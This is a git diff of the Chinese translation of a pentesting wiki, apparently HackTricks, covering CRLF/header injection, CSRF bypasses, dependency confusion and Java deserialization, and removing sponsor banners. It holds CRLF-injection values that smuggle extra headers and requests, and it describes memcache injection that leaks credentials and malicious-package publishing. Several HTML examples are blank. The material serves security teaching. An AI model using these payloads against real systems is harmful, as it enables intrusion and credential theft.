 /%0d%0aLocation:%20http://myweb.com
 ```
@@ -76,7 +80,7 @@ HTTP Header Injection,通常通过 CRLF(回车和换行)注入进行利用
 
 #### 通过 HTTP Header Injection 利用 CORS
 
-攻击者可以注入 HTTP 头以启用 CORS(跨源资源共享),绕过 SOP 强加的限制。这一漏洞允许来自恶意来源的脚本与来自不同来源的资源交互,可能访问受保护的数据。
+攻击者可以注入 HTTP 头以启用 CORS(跨源资源共享),绕过 SOP 强加的限制。这一漏洞允许来自恶意来源的脚本与来自不同来源的资源进行交互,可能访问受保护的数据。
 
 #### 通过 CRLF 的 SSRF 和 HTTP 请求注入
 
@@ -127,7 +131,7 @@ GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0
 
 ### Memcache 注入
 
-Memcache 是一个**使用明文协议的键值存储**。更多信息请参见:
+Memcache 是一个**使用明文协议的键值存储**。更多信息在:
 
 {{#ref}}
 ../network-services-pentesting/11211-memcache/
@@ -135,9 +139,9 @@ Memcache 是一个**使用明文协议的键值存储**。更多信息请参见
 
 **有关完整信息,请阅读**[ **原始报告**](https://www.sonarsource.com/blog/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/)
 
-如果一个平台从**HTTP请求中获取数据并在未清理的情况下使用**它来对**memcache**服务器执行**请求**,攻击者可能会利用这种行为**注入新的 memcache 命令**。
+如果一个平台从**HTTP请求中获取数据并在未清理的情况下使用它**来对**memcache**服务器执行**请求**,攻击者可能会利用这种行为**注入新的 memcache 命令**。
 
-例如,在最初发现的漏洞中,缓存键用于返回用户应连接的 IP 和端口,攻击者能够**注入 memcache 命令**,这将**毒害**缓存以将受害者的详细信息(包括用户名和密码)发送到攻击者的服务器:
+例如,在最初发现的漏洞中,缓存键用于返回用户应连接的 IP 和端口,攻击者能够**注入 memcache 命令**,这将**毒害**缓存以将**受害者的详细信息**(包括用户名和密码)发送到攻击者的服务器:
 
 
https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/ba72cd16-2ca0-447b-aa70-5cde302a0b88/body-578d9f9f-1977-4e34-841c-ad870492328f_10.png?w=1322&h=178&auto=format&fit=crop

 
@@ -193,10 +197,6 @@ Memcache 是一个**使用明文协议的键值存储**。更多信息请参见
 - [**https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning)
 - [**https://www.netsparker.com/blog/web-security/crlf-http-header/**](https://www.netsparker.com/blog/web-security/crlf-http-header/)
 
-

 
-**漏洞赏金提示**:**注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
-
-{% embed url="https://go.intigriti.com/hacktricks" %}
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/csrf-cross-site-request-forgery.md b/src/pentesting-web/csrf-cross-site-request-forgery.md
index ebf340e52..c9a0f186d 100644
--- a/src/pentesting-web/csrf-cross-site-request-forgery.md
+++ b/src/pentesting-web/csrf-cross-site-request-forgery.md
@@ -2,21 +2,6 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
-
-**黑客见解**\
-参与深入探讨黑客的刺激与挑战的内容
-
-**实时黑客新闻**\
-通过实时新闻和见解,跟上快速变化的黑客世界
-
-**最新公告**\
-了解最新的漏洞赏金计划和重要平台更新
-
-**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作!
-
 ## 跨站请求伪造 (CSRF) 解释
 
 **跨站请求伪造 (CSRF)** 是一种在 web 应用程序中发现的安全漏洞。它使攻击者能够通过利用用户的认证会话,代表毫无防备的用户执行操作。当一个已登录受害者平台的用户访问恶意网站时,攻击就会被执行。该网站随后通过执行 JavaScript、提交表单或获取图像等方法触发对受害者账户的请求。
@@ -25,13 +10,13 @@
 
 要利用 CSRF 漏洞,必须满足几个条件:
 
-1. **识别有价值的操作**:攻击者需要找到值得利用的操作,例如更改用户的密码、电子邮件或提升权限。
-2. **会话管理**:用户的会话应仅通过 cookies 或 HTTP Basic Authentication 头进行管理,因为其他头无法用于此目的。
+1. **识别有价值的操作**:攻击者需要找到一个值得利用的操作,例如更改用户的密码、电子邮件或提升权限。
+2. **会话管理**:用户的会话应仅通过 cookies 或 HTTP Basic Authentication 头进行管理,因为其他头无法为此目的进行操控。
 3. **缺乏不可预测的参数**:请求不应包含不可预测的参数,因为它们可能会阻止攻击。
 
 ### 快速检查
 
-您可以 **在 Burp 中捕获请求** 并检查 CSRF 保护,您可以通过浏览器点击 **复制为 fetch** 并检查请求:
+您可以在 **Burp** 中捕获请求并检查 CSRF 保护,您可以从浏览器中点击 **复制为 fetch** 并检查请求:
 
 

 
@@ -39,14 +24,14 @@
 
 可以实施几种对策来保护免受 CSRF 攻击:
 
-- [**SameSite cookies**](hacking-with-cookies/#samesite):此属性防止浏览器在跨站请求中发送 cookies。[了解更多关于 SameSite cookies](hacking-with-cookies/#samesite)。
+- [**SameSite cookies**](hacking-with-cookies/#samesite):此属性防止浏览器在跨站请求中发送 cookies。[有关 SameSite cookies 的更多信息](hacking-with-cookies/#samesite)。
 - [**跨源资源共享**](cors-bypass.md):受害者网站的 CORS 策略可能会影响攻击的可行性,特别是当攻击需要读取受害者网站的响应时。[了解 CORS 绕过](cors-bypass.md)。
 - **用户验证**:提示用户输入密码或解决验证码可以确认用户的意图。
 - **检查引荐或来源头**:验证这些头可以帮助确保请求来自受信任的来源。然而,精心构造的 URL 可以绕过实施不当的检查,例如:
   - 使用 `http://mal.net?orig=http://example.com`(URL 以受信任的 URL 结尾)
   - 使用 `http://example.com.mal.net`(URL 以受信任的 URL 开头)
-- **修改参数名称**:更改 POST 或 GET 请求中的参数名称可以帮助防止自动化攻击。
-- **CSRF 令牌**:在每个会话中引入唯一的 CSRF 令牌,并要求在后续请求中使用该令牌,可以显著降低 CSRF 的风险。通过强制实施 CORS,可以增强令牌的有效性。
+- **修改参数名称**:更改 POST 或 GET 请求中参数的名称可以帮助防止自动化攻击。
+- **CSRF 令牌**:在每个会话中加入唯一的 CSRF 令牌,并要求在后续请求中使用该令牌,可以显著降低 CSRF 的风险。通过强制实施 CORS,可以增强令牌的有效性。
 
 理解和实施这些防御措施对于维护 web 应用程序的安全性和完整性至关重要。
 
@@ -58,13 +43,13 @@
 
 ### 缺少令牌
 
-应用程序可能会实现一种机制来 **验证令牌**,当它们存在时。然而,如果在令牌缺失时完全跳过验证,就会出现漏洞。攻击者可以通过 **删除携带令牌的参数**,而不仅仅是其值,来利用这一点。这使他们能够绕过验证过程,有效地进行跨站请求伪造 (CSRF) 攻击。
+应用程序可能会实现一种机制来 **验证令牌**,当它们存在时。然而,如果在令牌缺失时完全跳过验证,就会出现漏洞。攻击者可以通过 **删除携带令牌的参数**,而不仅仅是其值来利用这一点。这使他们能够绕过验证过程,有效地进行跨站请求伪造 (CSRF) 攻击。
 
 ### CSRF 令牌未与用户会话绑定
 
-未将 CSRF 令牌与用户会话绑定的应用程序存在重大 **安全风险**。这些系统将令牌与 **全局池** 进行验证,而不是确保每个令牌与发起会话绑定。
+未将 CSRF 令牌与用户会话绑定的应用程序存在重大 **安全风险**。这些系统验证令牌是针对 **全局池**,而不是确保每个令牌与发起会话绑定。
 
-攻击者如何利用这一点:
+攻击者利用这一点的方式如下:
 
 1. **使用自己的账户进行身份验证**。
 2. **从全局池中获取有效的 CSRF 令牌**。
@@ -74,7 +59,7 @@
 
 ### 方法绕过
 
-如果请求使用“**奇怪**”的 **方法**,请检查 **方法** **覆盖功能** 是否有效。例如,如果它 **使用 PUT** 方法,您可以尝试 **使用 POST** 方法并 **发送**:_https://example.com/my/dear/api/val/num?**\_method=PUT**_
+如果请求使用的是一种 "**奇怪的**" **方法**,请检查 **方法** **覆盖功能** 是否有效。例如,如果它 **使用 PUT** 方法,您可以尝试 **使用 POST** 方法并 **发送**:_https://example.com/my/dear/api/val/num?**\_method=PUT**_
 
 这也可以通过在 POST 请求中发送 **\_method 参数** 或使用 **头** 来实现:
 
@@ -84,18 +69,18 @@
 
 ### 自定义头令牌绕过
 
-如果请求在请求中添加了带有 **令牌** 的 **自定义头** 作为 **CSRF 保护方法**,那么:
+如果请求在请求中添加了一个 **自定义头**,并将 **令牌** 作为 **CSRF 保护方法**,那么:
 
 - 测试不带 **自定义令牌和头** 的请求。
 - 测试请求,使用确切 **相同长度但不同的令牌**。
 
 ### CSRF 令牌通过 cookie 验证
 
-应用程序可能通过在 cookie 和请求参数中重复令牌,或通过设置 CSRF cookie 并验证后端发送的令牌是否与 cookie 中的值相对应来实现 CSRF 保护。应用程序通过检查请求参数中的令牌是否与 cookie 中的值对齐来验证请求。
+应用程序可能通过在 cookie 和请求参数中复制令牌,或通过设置 CSRF cookie 并验证后端发送的令牌是否与 cookie 中的值相对应来实现 CSRF 保护。应用程序通过检查请求参数中的令牌是否与 cookie 中的值一致来验证请求。
 
 然而,如果网站存在缺陷,允许攻击者在受害者的浏览器中设置 CSRF cookie,例如 CRLF 漏洞,则此方法容易受到 CSRF 攻击。攻击者可以通过加载一个欺骗性图像来设置 cookie,然后发起 CSRF 攻击。
 
-以下是攻击可能如何构造的示例:
+以下是攻击可能结构的示例:
 ```html
 
 
@@ -122,7 +107,7 @@ onerror="document.forms[0].submit();" />
 
 ### Content-Type 更改
 
-根据 [**this**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests),为了**避免预检**请求使用**POST**方法,允许的Content-Type值如下:
+根据 [**this**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests),为了**避免预检**请求使用**POST**方法,允许的 Content-Type 值如下:
 
 - **`application/x-www-form-urlencoded`**
 - **`multipart/form-data`**
@@ -130,7 +115,7 @@ onerror="document.forms[0].submit();" />
 
 但是,请注意,**服务器逻辑可能会有所不同**,具体取决于使用的**Content-Type**,因此您应该尝试提到的值以及其他值,如**`application/json`**_**,**_**`text/xml`**, **`application/xml`**_._
 
-示例(来自 [here](https://brycec.me/posts/corctf_2021_challenges))将JSON数据作为text/plain发送:
+示例(来自 [here](https://brycec.me/posts/corctf_2021_challenges))将 JSON 数据作为 text/plain 发送:
 ```html
 
 
@@ -151,11 +136,11 @@ form.submit()
 ```
 ### 绕过 JSON 数据的预检请求
 
-在尝试通过 POST 请求发送 JSON 数据时,直接在 HTML 表单中使用 `Content-Type: application/json` 是不可能的。同样,使用 `XMLHttpRequest` 发送这种内容类型会启动预检请求。然而,有一些策略可以潜在地绕过这个限制,并检查服务器是否处理 JSON 数据而不考虑 Content-Type:
+在尝试通过 POST 请求发送 JSON 数据时,直接在 HTML 表单中使用 `Content-Type: application/json` 是不可能的。同样,使用 `XMLHttpRequest` 发送此内容类型会启动预检请求。然而,有一些策略可以潜在地绕过此限制,并检查服务器是否处理 JSON 数据,而不考虑 Content-Type:
 
-1. **使用替代内容类型**:通过在表单中设置 `enctype="text/plain"` 来使用 `Content-Type: text/plain` 或 `Content-Type: application/x-www-form-urlencoded`。这种方法测试后端是否利用数据而不考虑 Content-Type。
+1. **使用替代内容类型**:通过在表单中设置 `enctype="text/plain"` 来使用 `Content-Type: text/plain` 或 `Content-Type: application/x-www-form-urlencoded`。这种方法测试后端是否使用数据,而不考虑 Content-Type。
 2. **修改内容类型**:为了避免预检请求,同时确保服务器将内容识别为 JSON,您可以发送 `Content-Type: text/plain; application/json` 的数据。这不会触发预检请求,但如果服务器配置为接受 `application/json`,可能会被正确处理。
-3. **SWF Flash 文件利用**:一种不太常见但可行的方法是使用 SWF Flash 文件来绕过此类限制。有关此技术的深入理解,请参阅 [this post](https://anonymousyogi.medium.com/json-csrf-csrf-that-none-talks-about-c2bf9a480937)。
+3. **使用 SWF Flash 文件**:一种不太常见但可行的方法是使用 SWF Flash 文件来绕过此类限制。有关此技术的深入理解,请参阅 [this post](https://anonymousyogi.medium.com/json-csrf-csrf-that-none-talks-about-c2bf9a480937)。
 
 ### 引用/来源检查绕过
 
@@ -204,7 +189,7 @@ document.forms[0].submit()
 ```
 ### **HEAD 方法绕过**
 
-[**这个 CTF 文章**](https://github.com/google/google-ctf/tree/master/2023/web-vegsoda/solution) 的第一部分解释了 [Oak 的源代码](https://github.com/oakserver/oak/blob/main/router.ts#L281),一个路由器被设置为 **将 HEAD 请求作为 GET 请求处理**,且没有响应体 - 这是一种常见的变通方法,并不是 Oak 独有的。它们并没有特定的处理程序来处理 HEAD 请求,而是 **直接交给 GET 处理程序,但应用程序只是移除了响应体**。
+[**这个 CTF 文章**](https://github.com/google/google-ctf/tree/master/2023/web-vegsoda/solution)的第一部分解释了 [Oak 的源代码](https://github.com/oakserver/oak/blob/main/router.ts#L281),一个路由器被设置为 **将 HEAD 请求作为 GET 请求处理**,且没有响应体 - 这是一种常见的变通方法,并不是 Oak 独有的。它们并没有特定的处理程序来处理 HEAD 请求,而是 **直接交给 GET 处理程序,但应用程序只是移除了响应体**。
 
 因此,如果 GET 请求受到限制,你可以 **发送一个将被处理为 GET 请求的 HEAD 请求**。
 
@@ -212,7 +197,7 @@ document.forms[0].submit()
 
 ### **提取 CSRF 令牌**
 
-如果 **CSRF 令牌** 被用作 **防御**,你可以尝试 **利用** [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) 漏洞或 [**悬挂标记**](dangling-markup-html-scriptless-injection/) 漏洞来 **提取它**。
+如果 **CSRF 令牌** 被用作 **防御**,你可以尝试 **提取它**,利用 [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) 漏洞或 [**悬挂标记**](dangling-markup-html-scriptless-injection/) 漏洞。
 
 ### **使用 HTML 标签的 GET**
 ```xml
@@ -220,7 +205,7 @@ document.forms[0].submit()
 
404 - Page not found

 The URL you are requesting is no longer available
 ```
-其他可以用来自动发送 GET 请求的 HTML5 标签包括:
+其他可以用于自动发送 GET 请求的 HTML5 标签包括:
 ```html
 
 
@@ -550,7 +535,7 @@ height="600" width="800">
 
 
 ```
-### **POST通过Ajax窃取CSRF令牌并发送带表单的POST**
+### **POST通过Ajax窃取CSRF令牌并使用表单发送POST**
 ```html
 
 

-
-加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
-
-**黑客见解**\
-参与深入探讨黑客的刺激与挑战的内容
-
-**实时黑客新闻**\
-通过实时新闻和见解,跟上快速变化的黑客世界
-
-**最新公告**\
-及时了解最新的漏洞赏金计划和重要平台更新
-
-**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶尖黑客合作吧!
-
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/dependency-confusion.md b/src/pentesting-web/dependency-confusion.md
index 1f267aaf7..b61bb52d8 100644
--- a/src/pentesting-web/dependency-confusion.md
+++ b/src/pentesting-web/dependency-confusion.md
@@ -2,13 +2,10 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-{% embed url="https://websec.nl/" %}
 
 ## 基本信息
 
-总之,依赖混淆漏洞发生在项目使用了一个**拼写错误**、**不存在**或**未指定版本**的库,并且所使用的依赖库仓库允许从**公共**仓库中**获取更新版本**。
+总之,依赖混淆漏洞发生在项目使用了一个**拼写错误**、**不存在**或**未指定版本**的库,并且所使用的依赖库仓库允许从**公共**仓库**获取更新版本**。
 
 - **拼写错误**:导入**`reqests`**而不是`requests`
 - **不存在**:导入`company-logging`,一个**不再存在**的内部库
@@ -17,18 +14,18 @@
 ## 利用
 
 > [!WARNING]
-> 在所有情况下,攻击者只需发布一个**恶意包,名称与受害公司使用的库相同**。
+> 在所有情况下,攻击者只需发布一个**恶意包,名称**与受害公司使用的库相同。
 
 ### 拼写错误与不存在
 
-如果你的公司试图**导入一个不是内部的库**,很可能库的仓库会在**公共仓库**中搜索它。如果攻击者创建了这个库,你的代码和运行的机器很可能会被攻陷。
+如果您的公司试图**导入一个不是内部的库**,很可能库的仓库会在**公共仓库**中搜索它。如果攻击者创建了它,您的代码和运行的机器很可能会被攻陷。
 
 ### 未指定版本
 
-开发者**不指定任何版本**的库,或仅指定一个**主要版本**是非常常见的。然后,解释器会尝试下载符合这些要求的**最新版本**。\
+开发者**不指定任何版本**的库,或仅指定一个**主要版本**是非常常见的。然后,解释器将尝试下载符合这些要求的**最新版本**。\
 如果库是一个**已知的外部库**(如python的`requests`),攻击者**无法做太多**,因为他无法创建一个名为`requests`的库(除非他是原作者)。\
-然而,如果库是**内部的**,如本例中的`requests-company`,如果**库仓库**允许**检查新版本也来自外部**,它将搜索一个公开可用的更新版本。\
-因此,如果一个**攻击者知道**公司正在使用`requests-company`库的**版本1.0.1**(允许小版本更新)。他可以**发布**库`requests-company`的**版本1.0.2**,而公司将**使用该库而不是内部库**。
+然而,如果库是**内部的**,如本例中的`requests-company`,如果**库仓库**允许**也从外部检查新版本**,它将搜索公开可用的更新版本。\
+因此,如果攻击者知道公司正在使用`requests-company`库的**版本1.0.1**(允许小版本更新)。他可以**发布**库`requests-company`的**版本1.0.2**,而公司将**使用该库而不是内部库**。
 
 ## AWS修复
 
@@ -44,8 +41,5 @@ AWS通过允许指定库是内部还是外部来修复此问题,以避免从
 - [https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
 - [https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d](https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d)
 
-

-
-{% embed url="https://websec.nl/" %}
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/deserialization/README.md b/src/pentesting-web/deserialization/README.md
index 336be0611..ac004825f 100644
--- a/src/pentesting-web/deserialization/README.md
+++ b/src/pentesting-web/deserialization/README.md
@@ -4,7 +4,7 @@
 
 ## 基本信息
 
-**序列化** 被理解为将对象转换为可以保存的格式的方法,目的是存储对象或将其作为通信过程的一部分进行传输。这种技术通常用于确保对象可以在稍后的时间重新创建,保持其结构和状态。
+**序列化** 被理解为将对象转换为可以保存的格式的方法,目的是存储对象或作为通信过程的一部分进行传输。这种技术通常用于确保对象可以在稍后时间重新创建,保持其结构和状态。
 
 **反序列化** 则是与序列化相对的过程。它涉及将以特定格式结构化的数据重新构建回对象。
 
@@ -17,7 +17,7 @@
 - `__sleep`: 在对象被序列化时调用。此方法应返回一个数组,包含所有应被序列化的对象属性的名称。它通常用于提交待处理的数据或执行类似的清理任务。
 - `__wakeup`: 在对象被反序列化时调用。它用于重新建立在序列化过程中可能丢失的任何数据库连接,并执行其他重新初始化任务。
 - `__unserialize`: 当对象被反序列化时,此方法会被调用(如果存在),而不是 `__wakeup`。与 `__wakeup` 相比,它对反序列化过程提供了更多控制。
-- `__destruct`: 当对象即将被销毁或脚本结束时调用此方法。它通常用于清理任务,例如关闭文件句柄或数据库连接。
+- `__destruct`: 当对象即将被销毁或脚本结束时调用此方法。它通常用于清理任务,如关闭文件句柄或数据库连接。
 - `__toString`: 此方法允许将对象视为字符串。它可以用于读取文件或其他基于其中函数调用的任务,有效地提供对象的文本表示。
 ```php
 " 或 "|" 来重定向执行的输出,不能使用 "$()" 来执行命令,甚至不能 **通过空格分隔** 来传递参数给命令(您可以执行 `echo -n "hello world"`,但不能执行 `python2 -c 'print "Hello world"'`)。为了正确编码有效负载,您可以 [使用这个网页](http://www.jackson-t.ca/runtime-exec-payloads.html)。
+在为 **java.lang.Runtime.exec()** 创建有效负载时,您 **不能使用特殊字符**,如 ">" 或 "|" 来重定向执行的输出,不能使用 "$()" 来执行命令,甚至不能 **通过空格** 分隔 **传递参数** 给命令(您可以执行 `echo -n "hello world"`,但不能执行 `python2 -c 'print "Hello world"'`)。为了正确编码有效负载,您可以 [使用这个网页](http://www.jackson-t.ca/runtime-exec-payloads.html)。
 
 请随意使用下一个脚本来创建 **所有可能的代码执行** 有效负载,适用于 Windows 和 Linux,然后在易受攻击的网页上进行测试:
 ```python
@@ -493,17 +493,17 @@ mvn clean package -DskipTests
 
 Java在各种目的上使用了大量的序列化,例如:
 
-- **HTTP请求**: 序列化广泛应用于参数、ViewState、cookies等的管理。
+- **HTTP请求**: 序列化广泛用于参数、ViewState、cookies等的管理。
 - **RMI (远程方法调用)**: Java RMI协议完全依赖于序列化,是Java应用程序中远程通信的基石。
 - **RMI over HTTP**: 这种方法通常被基于Java的厚客户端web应用程序使用,利用序列化进行所有对象通信。
 - **JMX (Java管理扩展)**: JMX利用序列化在网络上传输对象。
-- **自定义协议**: 在Java中,标准做法涉及传输原始Java对象,这将在即将到来的利用示例中演示。
+- **自定义协议**: 在Java中,标准做法涉及传输原始Java对象,这将在即将到来的漏洞示例中演示。
 
 ### Prevention
 
 #### Transient objects
 
-一个实现了`Serializable`的类可以将类内任何不应该被序列化的对象实现为`transient`。例如:
+一个实现了`Serializable`的类可以将类中任何不应该被序列化的对象实现为`transient`。例如:
 ```java
 public class myAccount implements Serializable
 {
@@ -512,7 +512,7 @@ private transient double margin; // declared transient
 ```
 #### 避免序列化需要实现 Serializable 的类
 
-在某些 **对象必须实现 `Serializable`** 接口的场景中,由于类层次结构,存在无意反序列化的风险。为防止这种情况,确保这些对象是不可反序列化的,通过定义一个始终抛出异常的 `final` `readObject()` 方法,如下所示:
+在某些 **对象必须实现 `Serializable`** 接口的场景中,由于类层次结构,存在无意反序列化的风险。为防止这种情况,确保这些对象不可反序列化,通过定义一个始终抛出异常的 `final` `readObject()` 方法,如下所示:
 ```java
 private final void readObject(ObjectInputStream in) throws java.io.IOException {
 throw new java.io.IOException("Cannot be deserialized");
@@ -546,7 +546,7 @@ return super.resolveClass(desc);
 }
 }
 ```
-**使用 Java 代理增强安全性** 提供了一种在无法修改代码时的备用解决方案。此方法主要适用于 **黑名单有害类**,使用 JVM 参数:
+**使用 Java Agent 增强安全性** 提供了一种在无法修改代码时的备用解决方案。此方法主要适用于 **黑名单有害类**,使用 JVM 参数:
 ```
 -javaagent:name-of-agent.jar
 ```
@@ -568,37 +568,37 @@ return Status.ALLOWED;
 };
 ObjectInputFilter.Config.setSerialFilter(filter);
 ```
-**利用外部库增强安全性**:像**NotSoSerial**、**jdeserialize**和**Kryo**这样的库提供了控制和监控Java反序列化的高级功能。这些库可以提供额外的安全层,例如白名单或黑名单类、在反序列化之前分析序列化对象,以及实现自定义序列化策略。
+**利用外部库增强安全性**:像 **NotSoSerial**、**jdeserialize** 和 **Kryo** 这样的库提供了控制和监控 Java 反序列化的高级功能。这些库可以提供额外的安全层,例如白名单或黑名单类、在反序列化之前分析序列化对象,以及实现自定义序列化策略。
 
-- **NotSoSerial**拦截反序列化过程,以防止执行不受信任的代码。
-- **jdeserialize**允许在不反序列化的情况下分析序列化的Java对象,帮助识别潜在的恶意内容。
-- **Kryo**是一个替代的序列化框架,强调速度和效率,提供可配置的序列化策略,可以增强安全性。
+- **NotSoSerial** 拦截反序列化过程,以防止执行不受信任的代码。
+- **jdeserialize** 允许在不反序列化的情况下分析序列化的 Java 对象,帮助识别潜在的恶意内容。
+- **Kryo** 是一个替代的序列化框架,强调速度和效率,提供可配置的序列化策略,可以增强安全性。
 
 ### 参考文献
 
 - [https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html)
-- 反序列化和ysoserial讲座:[http://frohoff.github.io/appseccali-marshalling-pickles/](http://frohoff.github.io/appseccali-marshalling-pickles/)
+- 反序列化和 ysoserial 讲座:[http://frohoff.github.io/appseccali-marshalling-pickles/](http://frohoff.github.io/appseccali-marshalling-pickles/)
 - [https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/](https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)
 - [https://www.youtube.com/watch?v=VviY3O-euVQ](https://www.youtube.com/watch?v=VviY3O-euVQ)
-- 讲座关于gadgetinspector:[https://www.youtube.com/watch?v=wPbW6zQ52w8](https://www.youtube.com/watch?v=wPbW6zQ52w8)和幻灯片:[https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf](https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf)
-- Marshalsec论文:[https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true](https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true)
+- 讲座关于 gadgetinspector:[https://www.youtube.com/watch?v=wPbW6zQ52w8](https://www.youtube.com/watch?v=wPbW6zQ52w8) 和幻灯片:[https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf](https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf)
+- Marshalsec 论文:[https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true](https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true)
 - [https://dzone.com/articles/why-runtime-compartmentalization-is-the-most-compr](https://dzone.com/articles/why-runtime-compartmentalization-is-the-most-compr)
 - [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html)
 - [https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html](https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html)
-- Java和.Net JSON反序列化**论文:**[**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,**讲座:[https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c)和幻灯片:[https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
-- 反序列化CVE:[https://paper.seebug.org/123/](https://paper.seebug.org/123/)
+- Java 和 .Net JSON 反序列化 **论文:** [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,** 讲座:[https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) 和幻灯片:[https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
+- 反序列化 CVE:[https://paper.seebug.org/123/](https://paper.seebug.org/123/)
 
-## JNDI注入与log4Shell
+## JNDI 注入与 log4Shell
 
-查找**JNDI注入,如何通过RMI、CORBA和LDAP滥用它以及如何利用log4shell**(以及此漏洞的示例)在以下页面:
+查找 **JNDI 注入、如何通过 RMI、CORBA 和 LDAP 滥用它以及如何利用 log4shell**(以及此漏洞的示例)在以下页面:
 
 {{#ref}}
 jndi-java-naming-and-directory-interface-and-log4shell.md
 {{#endref}}
 
-## JMS - Java消息服务
+## JMS - Java 消息服务
 
-> **Java消息服务**(**JMS**)API是一个Java面向消息的中间件API,用于在两个或多个客户端之间发送消息。它是处理生产者-消费者问题的实现。JMS是Java平台企业版(Java EE)的一部分,由Sun Microsystems开发的规范定义,但此后由Java社区过程指导。它是一种消息标准,允许基于Java EE的应用程序组件创建、发送、接收和读取消息。它允许分布式应用程序的不同组件之间的通信是松耦合、可靠和异步的。(来自[维基百科](https://en.wikipedia.org/wiki/Java_Message_Service))。
+> **Java 消息服务** (**JMS**) API 是一个用于在两个或多个客户端之间发送消息的 Java 消息导向中间件 API。它是处理生产者-消费者问题的实现。JMS 是 Java 平台企业版(Java EE)的一部分,由 Sun Microsystems 开发的规范定义,但此后由 Java 社区过程指导。它是一种消息标准,允许基于 Java EE 的应用程序组件创建、发送、接收和读取消息。它允许分布式应用程序的不同组件之间的通信是松耦合、可靠和异步的。(来自 [Wikipedia](https://en.wikipedia.org/wiki/Java_Message_Service))。
 
 ### 产品
 
@@ -610,21 +610,21 @@ jndi-java-naming-and-directory-interface-and-log4shell.md
 
 ### 利用
 
-所以,基本上有**一堆服务以危险的方式使用JMS**。因此,如果您有**足够的权限**向这些服务发送消息(通常您需要有效的凭据),您将能够发送**恶意序列化对象,这些对象将被消费者/订阅者反序列化**。\
-这意味着在此利用中,所有**将使用该消息的客户端将被感染**。
+所以,基本上有很多 **以危险方式使用 JMS 的服务**。因此,如果您有 **足够的权限** 向这些服务发送消息(通常您需要有效的凭据),您可能能够发送 **将被消费者/订阅者反序列化的恶意序列化对象**。\
+这意味着在此利用中,所有 **将使用该消息的客户端都会被感染**。
 
-您应该记住,即使服务存在漏洞(因为它不安全地反序列化用户输入),您仍然需要找到有效的gadget来利用该漏洞。
+您应该记住,即使服务存在漏洞(因为它不安全地反序列化用户输入),您仍然需要找到有效的 gadget 来利用该漏洞。
 
